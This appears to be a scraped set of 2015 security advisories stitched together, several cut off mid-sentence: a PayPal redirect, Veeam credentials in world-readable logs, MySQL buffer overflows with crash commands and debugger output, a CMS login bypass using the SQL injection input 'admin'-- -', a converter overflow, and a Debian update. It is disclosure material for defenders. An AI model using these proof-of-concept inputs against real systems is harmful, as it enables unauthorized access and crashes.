PayPal Inc Bug Bounty #119 - URL Redirect Web Vulnerability
Document Title: === PayPal Inc Bug Bounty #119 - URL Redirect Web Vulnerability References (Source): http://www.vulnerability-lab.com/get_content.php?id=1610 Release Date: = 2015-10-01 Vulnerability Laboratory ID (VL-ID): 1610 Common Vulnerability Scoring System: 2.4 Product & Service Introduction: === PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally, a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer s choice. But some time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy (for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards. The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request a transfer to their bank account. PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient s account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United States at eBay s North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale, Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across Europe, PayPal also operates as a Luxembourg-based bank. On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China s bankcard association, to allow Chinese consumers to use PayPal to shop online. PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010. (Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal] Abstract Advisory Information: == An independent vulnerability laboratory researcher discovered a client-side url redirect web vulnerability in the official PayPal Inc Notify online service web-application. Vulnerability Disclosure Timeline: == 2015-08-28: Researcher Notification & Coordination (Rui Silva) 2015-08-09: Vendor Notification (PayPal Security Team - Bug Bounty Program) 2015-09-08: Vendor Response/Feedback (PayPal Security Team - Bug Bounty Program) 2015-09-24: Vendor Fix/Patch (PayPal Inc Developer Team) 2015-10-01: Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): PayPal Inc Product: PayPal - Online Service Web Application 2015 Q3 Exploitation Technique: === Remote Severity Level: === Low Technical Details & Description: A low severity and client-side url redirect web vulnerability has been discovered in the official PayPal Inc Notify online service web-application. The vulnerability allows remote attackers to form malicious links as client-side GET method requests to manipulate a return url. The vulnerability is located in the redirectUrl value of the main_home module. Remote attackers are able to prepare manipulated client-side application to browser requests. Thus results in a client-side context manipulation after the redirect itself. After some seconds the service refreshs and allows to load the url by a special crafted payload that bypass the validation procedure. The vulnerability can be exploited by remote attackers without privilege web-application user
Veeam Backup & Replication Local Privilege Escalation Vulnerability
Veeam Backup & Replication Local Privilege Escalation Vulnerability Name Sensitive Data Exposure in Veem Backup Systems Affected Veeam Backup & Replication (B) v6, v6.5, v7, v8 Severity High 7.9/10 ImpactCVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L Vendorhttp://www.veeam.com/ Advisory http://www.ush.it/team/ush/hack-veeam_6_7_8/veeam.txt Authors Pasquale "sid" Fiorillo (sid AT ush DOT it) Francesco "ascii" Ongaro (ascii AT ush DOT it) Antonio "s4tan" Parata (s4tan AT ush DOT it) Date 20151002 I. BACKGROUND Veeam Software provides backup, disaster recovery and virtualization management software for the VMware and Hyper-V environments. In 2012 Veeam gained more than 1200 employees worldwide, from 10 employees in 2008. It has more than 157'000 customers, 33'000 partners and 80 top industry awards and claims to be the "#1 VM Backup" solution after it gained traction against competitors like Backup Exec and Tivoli Storage Manager. Veeam Backup & Replication is the foundation of many Veeam products, like Veeam Availability Suite and Veeam One. ISGroup is an Italian Information Security boutique, we found this 0day issue while performing a Penetration Test for a customer, you can discover more about ISGroup by visiting http://www.isgroup.biz/. Responsible disclosure with Veeam: Veeam has no public security@ contact and we worked with them through the ticket system opening a case using one of our customer's assistance contract. We were unable to escape from the sternness of this type of communication and move to PGP emails. Their response anyway was pretty prompt, we spoke first with Denis Bodnar and then escalate to Fred Bozhanov, Veeam Support Management. He managed communication with the developers. We advise Veeam to give some of their senior developers a "security team" mandate and to expose such team to external, direct, communication. The people we spoke to did their best and were extremely kind but they must be supported by a corporate process. Prior vulnerabilities in Veeam: It's very difficult to say if Veeam had previous vulnerabilities, there are no CVE assigned to this vendor both on Nist and to it's CPE (cpe:/:veeam). Information to customers of the vulnerability is shown in the "other" section of the changelog: "Removed weakly encrypted username and password logging from guest processing components using networkless (VIX) guest interaction mode. Veeam thanks Pasquale Fiorillo and Francesco Ongaro of ISGroup for vulnerability discovery.". The latest version of the software at the time of writing can be obtained from: http://www.veeam.com/kb2068 http://forums.veeam.com/veeam-backup-replication-f2/8-0-common-issues-and-fixes-t24157.html#p130849 http://www.veeam.com/vmware-esx-backup.html II. DESCRIPTION The vulnerability allows a local Windows user, even with low privileges as the ones provided to an anonymous IIS's virtualhost user, to access Veeam Backup logfiles that include a double-base64 encoded version of the password used by Veeam to run. The affected component is VeeamVixProxy, created by default on installation and the user must be a privileged Local Administrator or a Domain Administrator. For example the wizard for adding a VMware or Hyper-V Backup Proxy explicitly state "Type in an account with local administrator privileges on the server you are adding. Use DOMAIN\USER format for domain accounts, or HOST\USER for local accounts.". We conservatively refer to this issue as a Local Administrator Privilege Escalation but the use of Domain Administrator accounts is not discouraged, if not advised, and we saw this pattern in our customer’s production infrastructures. TLDR: Anything able to read VeeamVixProxy logfiles, world readable by default, can escalate to Local or Domain Administrator. III. ANALYSIS Veeam Backup & Replication (B) v6, v6.5, v7, v8 store VeeamVixProxy logfiles in a directory accessible by Everyone and with permissions that make them readable by Everyone (Everyone is, in the Microsoft Windows terminology, the equivalent of the Unix’s nobody user). Such logs, that are continuously generated, contain a Local or Domain Administration user and password in an easily reversible (obfuscated) format. In versions of Veeam prior to 8 a bug prevented log rotation [3,4], on older systems there could be a large amount of logs and thus an extensive history of past and current Local or Domain Administrator credentials. A) Logfiles readable by Everyone As shown in http://www.veeam.com/kb1789 the default log path is Windows Server 2003: %allusersprofile%\Application Data\Veeam\Backup Windows Server 2008 and up: %programdata%\Veeam\Backup Our evidence is for Windows Server 2003, access to the needed files are guaranteed to the Windows group "Everyone" so any local user, even the ones used to map IIS sites, can access them. This
Advanced Information Security Corporation, Security Advisory (MYSQL v5.6.24 Buffer Overflows)
. === Advanced Information Security Corporation Security Advisory === a888b. d88b. 8P"YP"Y88 8|o||o|88 8' - .88 8`._.' Y8. d/ `8b. dP . Y8b. d8:' " `::88b d8" 'Y88b :8P ' :888 8a. : _a88P ._/"Yaa_: .| 88P| \ YP" `| 8P `. / \.___.d| .' `--..__)888P`._.' ~ Keeping Things Simple! MySQL v5.6.24 BUFFER OVERFLOWS Date: 07/10/2015 Author: Nicholas Lemonias = SUMMARY = During a manual source code audit of MYSQL Version 5.6.24, various buffer overflow issues have been realized. === TECHNICAL DETAILS === root@priv8: ~# /usr/bin/mysql_plugin `perl -e 'print â??Aâ? x 9000'` *** buffer overflow detected ***: mysql_plugin terminated === Backtrace: = /lib/i386-linux-gnu/i686/cmov/libc.so.6(+0x6c6f3)[0xb720d6f3] /lib/i386-linux-gnu/1686/cmov/libc.so.6(__fortify_fail+0x45)[0xb729b2d5] /lib/1386-linux-gnu/1686/cmov/libc.so.6(+0xf838a)[0xb729938a] /lib/i386-linux-gnu/1686/cmov/libc.so.6(__strcpy_chk+0x37)[0xb7298877] insecure call mysql_plugin(main+0x202)[0xb752ee22] /lib/i386-linux-gnu/1686/cmov/libc.so.6(__libc_start_main+0xf3)[0xb71baa 63] mysql_plugin(+0xa90d)[0xb752f90d] === Memory map: b680-b6821000 nw-p 00:00 b6821000-b690 ---p 00 00 b699d000-b699e000 ---p 00:00 b699e000-b71a1000 rw-p 00 00 b71a1000-b7345000 r-xp 00:13 1673 /lib/i386-linux-gnu/i686/cmov/libc-2.1 9.50 b7345000-b7347000 r-â??p 001a4000 00:13 1673 /lib/i386-linux~gnu/i686/cmov/libc-2.1 9.so b7347000-b7348000 rw-p 00la6000 00:13 1673 /lib/i386-linux-gnu/i686/cmov/libc-2.1 9.so b7348000-b734b000 rw-p 00 00 0 b734b000-b7367000 r-xp 00:13 15697 /lib/i386-linux-gnu/1ibgcc_s.so.1 b7367000-b7368000 rw-p 0001b000 00:13 15697 /lib/i386-linux-gnu/1ibgcc_s.so.1 b7368000â??b73ac000 r-xp 00:13 15649 /lib/i386-linux-gnu/1686/cmov/libm-2.1 9.so bffc9000-c000 pw-p 00:00 0 [stack] Program received signal SIGABRT, Aborted. 0xb7fdebe0 in __kernel_vsyscall () (gdb) bt #0 0xb7fdebe0 in __kernel_vsyscall () #1 0xb7caa307 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56 #2 0xb7cab9c3 in __GI_abort () at abort.c:89 #3 0xb7ce86f8 in __libc_message (do_abort=do_abort@entry=2, fmt=fmt@entry=0xb7ddbe55 "*** %s ***: %s terminated\nâ?) at ../sysdeps/posix/libc_fatal.c:175 #4 0xb7d762d5 in __GI___fortify_fail ( msg=msg@entry=0xb7ddbdd6 "buffer overflow detectedâ?) at fortify_fail.c:31 #5 0xb7d7438a in __GI___chk_fail () at chk_fail.c:28 #6 0xb7d73877 in __strcpy_chk (dest=0xbffe8c9c 'A' ..., src=0xbffe96ed 'A' ..., destlen=) at strcpy_chk.c:60 #7 0x80009e22 in main () (gdb) (gdb) disas Dump of assembler code for function __kernel_vsyscall: 0xb7fdebd0 <+0>: push %ecx 0xb7fdebd1 <+1>: push %edx 0xb7fdebd2 <+2>: push %ebp 0xb7fdebd3 <+3>: mov %esp,%ebp 0xb7fdebd5 <+5>: sysenter 0xb7fdebd7 <+7>: nop 0xb7fdebd8 <+8>: nop 0xb7fdebd9 <+9>: nop 0xb7fdebda <+10>: nop 0xb7fdebdb <+11>: nop 0xb7fdebdc <+12>: nop 0xb7fdebdd <+13>: nop 0xb7fdebde <+14>: int x80 => 0xb7fdebe0 <+16>: pop %ebp 0xb7fdebe1 <+17>: pop %edx 0xb7fdebe2 <+18>: pop %ecx 0xb7fdebe3 <+19>: ret End of assembler dump. (gdb) TECHNICAL SYNOPSIS / POC #2 Unsafe Use of strcpy; this can lead to a buffer overflow condition -> /lib/i386-linux-gnu/1686/cmov/libc.so.6(__strcpy_chk+0x37)[0xb7298877] A user-supplied string from the command-line is copied to a fixed length destination buffer. -[ mysql_plugin.c]--- Line: 796 - Filename: ../mysql/mysql-5.6.24/client/mysql_plugin.c strcpy(plugin_name, argv[i]); permission set: -rwxr-xr-x 1 root root 2833756 Jul 15 21:22 /usr/bin/mysql_plugin === MySQL V 5.6.24 VULNERABILITIES - SOURCE CODE === 1. Insecure use of sprintf Vulnerability Description: A char* type is copied to a fixed length destination buffer. This could lead to a buffer overflow. Line: 577 - Filename: ../mysql/mysql-5.6.24/regex/main.c sprintf(efbuf, "MY_REG_%s", name); 2. Unsafe Use of strcpy could lead to an overflow condition. Vulnerability Description: A user-supplied string from the command-line is copied to a fixed length destination buffer. This could lead to a buffer overflow. Line: 796 - Filename: ../mysql/mysql-5.6.24/client/mysql_plugin.c strcpy(plugin_name, argv[i]); 3. Unsafe Use of strcpy could lead to an overflow condition. Vulnerability Description: A user-supplied string from the command-line is copied to a fixed length destination buffer. This
WebComIndia CMS 2015Q4 - Auth Bypass Vulnerability
Document Title: === WebComIndia CMS 2015Q4 - Auth Bypass Vulnerability References (Source): http://www.vulnerability-lab.com/get_content.php?id=1614 Release Date: = 2015-10-07 Vulnerability Laboratory ID (VL-ID): 1614 Common Vulnerability Scoring System: 8.3 Product & Service Introduction: === Where quality & reliability converge. Web.Com (India) is an ISO 9001:2008 certified Software company specialising in custom software development, web design and development, mobile app development, SEO and SMO Services in Guwahati, Assam. Deploying the latest technologies, we deliver solutions that offer high levels of consistency in quality and performance. Our technological intelligence spans several platforms, languages and databases. As a leading IT solutions provider, our technical skill set is ever up-to-date, comprising of the latest and the quintessential. (Copy of the Vendor Homepage: http://www.webcomindia.biz/ ) Abstract Advisory Information: == An independent vulnerability laboratory researcher discovered an auth bypass vulnerability in the official WebComIndia Content Management System (web-application). Vulnerability Disclosure Timeline: == 2015-10-07: Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): WebComIndia Ltd Product: WebComIndia.Biz - Content Management System 2015 Q4 Exploitation Technique: === Remote Severity Level: === High Technical Details & Description: An auth bypass web vulnerability has been discovered in the official WebComIndia Content Management System 2015Q4. The vulnerability allows remote attackers to bypass the login mechanism of the web-application to compromise the service. The auth bypass web vulnerability has been discovered in the Username input field of the login module. Remote attackers are able to bypass the mechanism to unauthorized login to the web-application. The vulnerability is located in the code-line on the application-side of the online-service. The request method to inject/execute is POST and the injection point is the Username. The vulnerability is a classic login auth bypass that allows to finally compromise the dbms and web-application at the end. The security risk of the auth bypass vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.3. Exploitation of the login form auth bypass web vulnerability requires no privilege web-application user account or user interaction. Successful exploitation of the vulnerability results in unauthorized access to the admin panel, defacement, web-application and dbms compromise. Request Method(s): [+] POST Vulnerable Module(s) [+] Login Affected Module(s) [+] Account System - (Admin Panel) Vulnerable Parameter(s): [+] Username Proof of Concept (PoC): === The auth bypass vulnerability can be exploited by remote attackers without privilege application user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Open the vulnerable website 2. Surf to the admin panel 3. Inject to the Username input the following content `admin'-- -` 4. Include any random value as Password input and save the form to continue 5. Click on Login and you will be able to bypass login Note: The Username input field and request is not sanitized properly 6. Successful reproduce of the remote auth bypass vulnerability! Website:http://[server].com/ Admin Panel:http://[server].com/admin PoC: (Input) Username: admin'-- - Password: purani > Login Bypass successful! Note: The password value can be choosen randomly by the attacker! Solution - Fix & Patch: === The vulnerability can be patched by a secure parse and encode or escape of the Username value input. Restrict the input and disallow special chars. Include an exception that prevents by usage of a prepared statement. Security Risk: == The security risk of the auth bypass vulnerability in the Username input field and login request is estimated as high. (CVSS 8.3) Credits & Authors: == Aaditya Purani - ( http://aadityapurani.com ) [ http://www.vulnerability-lab.com/show.php?user=Aaditya%20Purani ] Special Thanks: Hell Shield Hackers | Ahmedabad University | Skysecura Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab
FreeYouTubeToMP3 Converter 4.0.1 - Buffer Overflow Vulnerability
Document Title: === FreeYouTubeToMP3 Converter 4.0.1 - Buffer Overflow Vulnerability References (Source): http://www.vulnerability-lab.com/get_content.php?id=1613 Release Date: = 2015-10-06 Vulnerability Laboratory ID (VL-ID): 1613 Common Vulnerability Scoring System: 7.2 Product & Service Introduction: === Free YouTube to MP3 Converter is the world`s best software that lets you convert YouTube videos to MP3 and lossless. 300 Million people have enjoyed our software so far! It is the best choice to convert playlists and user channels to MP3. Download the music you love. Download your favorite artists music for a playback. onvert to MP3 keeping the best possible quality (up to 320 kbps). Music in bulk. Find playlists and YouTube channels to match your mood. Download and convert in a moment. Pure sound. Convert to lossless. Formats available: WAV, FLAC, ALAC. Perfect match. Convert YouTube to any device possible. Output formats: MP3, M4A, AAC, WMA, OGG. DVDVideoSoft`s products are freeware. In order to maintain product development and provide you with high-quality software, DVDVideoSoft may bundle links to other websites and third-party apps installations including toolbars in its products. Every time DVDVideoSoft products are installed, you have an obvious option to accept or opt-out of such installations. (Copy of the Vendor Homepage: https://www.dvdvideosoft.com ) Abstract Advisory Information: == An independent vulnerability laboratory researcher discovered a local buffer overflow vulnerability in the official Free Youtube To MP3 Converter v4.0.1 software. Vulnerability Disclosure Timeline: == 2015-10-06: Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): DVDVideoSoft Ltd. Product: Free YouTube to MP3 Converter - Software (Windows) 4.0.1.1001 Exploitation Technique: === Local Severity Level: === High Technical Details & Description: A classic buffer overflow vulnerability has been discovered in the official Free Youtube To MP3 Converter v4.0.1 software. The local vulnerability allows to overwrite the registers of the software process to compromise the target computer system. The vulnerability is located in the `Go Menu > Tools > Options > Key Activation` module. Local attackers are able to include malicious unicode payload as `key` value (input) to crash the software via buffer overflow. Local attackers are able to takeover the system process by an escalate of privileges in the local target computer system. The windows version of the software is affected by the vulnerability. The vulnerable input is located in the activation key module. The security risk of the buffer overflow vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.2. Exploitation of the vulnerability requires a low privilege system user account and no user interaction. Successful exploitation of the local vulnerability results in system compromise by elevation of privileges via overwrite of the registers. Vulnerable Module(s): [+] Go Menu > Tools > Options > Key Activation Vulnerable Input(s): [+] Activation Key Affected Module(s): [+] Activate Proof of Concept (PoC): === The security vulnerability can be exploited by local attackers with restricted account or system access and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Execute Free-YouTube-To-MP3-Converter.exe 2. Copy the ...string from bof.txt to clipboard 3. Go Menu -> Tools -> Options 4. Paste it the input Activation Key string click Activate 5. Software will Crash 6. Successful reproduce of the local buffer overflow vulnerability! --- Debug Session Logs [WINDGB] --- Access violation - code c005 (!!! second chance !!!) eax=00316a30 ebx=41414141 ecx=41414141 edx= esi=00316a30 edi= eip=779071b4 esp=003169cc ebp=00316a1c iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=0202 ntdll!KiFastSystemCallRet: 779071b4 c3 ret 0:000> !exchain 00319484: 41414141 Invalid exception stack at 41414141 0:000> d 00319484 00319484 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 00319494 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 003194a4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 003194b4 41 41 41 41 41 41 41 41-41 41 41
[SECURITY] [DSA 3371-1] spice security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-3371-1 secur...@debian.org https://www.debian.org/security/ Salvatore Bonaccorso October 09, 2015 https://www.debian.org/security/faq - - Package: spice CVE ID : CVE-2015-5260 CVE-2015-5261 Debian Bug : 801089 801091 Frediano Ziglio of Red Hat discovered several vulnerabilities in spice, a SPICE protocol client and server library. A malicious guest can exploit these flaws to cause a denial of service (QEMU process crash), execute arbitrary code on the host with the privileges of the hosting QEMU process or read and write arbitrary memory locations on the host. For the oldstable distribution (wheezy), these problems have been fixed in version 0.11.0-1+deb7u2. For the stable distribution (jessie), these problems have been fixed in version 0.12.5-1+deb8u2. For the unstable distribution (sid), these problems have been fixed in version 0.12.5-1.3. We recommend that you upgrade your spice packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCgAGBQJWGAWsAAoJEAVMuPMTQ89ETQQP/ipLkOB1y5LAKpD7Hym3qudp xCqd+3A9wptKN8WC2SBdvxFEXeb8I20PPbhkq5Th/S0taUbjx+dLg6OgK+4Ff7fv //E9QRsgcDUpFcV25l4dOxXVX0iRSBnN+QZnCZND5yOy3ON7rEEXV2lvOidIRCst sX+j2U2WZQCDQdY9xebSaF/tCR6mLMDE6WmMzz12dqW4A18HkiI9gXKsPSAPfAeY mMz39Zn5oiHptRzmE2VAGyyU8xW1VQbqj1QEE3nO4Pyk+49DG43djVK02bqrO9P4 u8cNhWhPYC3/QtB+sZJopFrQy4kxaNdtd8Ov1FKCW+HQC9tSwx/sW5VNvAJjHNU1 ZQAz+oCb65gQ74QuUd56srHuad+mlzPkyQTw6k5eHgMlUrxH/tkNp2xUMk0dl9D7 WMqKYQjpndMbDZiuqHv+pNhGCz4AHjVWMiYNZA7uBpU4vTowZafb0FA/C/M6MTEw zUyac6dJDkSgw0hPRN6z1nyhigMLjvbzZVbR3NwTCcYeMBRzW4EHsh+C4AOPlQKh mN6bNw45VSsxE3QFrxT5uh9AftQT6ljsJw06jbUSWT0DtIX8/egJLKWFs1ebMMjY ENnthiWjSFEc6nB3w843todHd6VjCVF54JimEeH4Y0Dv8PGdyRtn4o1Znff+S56M n14mCmekUHD7/xjyIVOO =EfnH -END PGP SIGNATURE-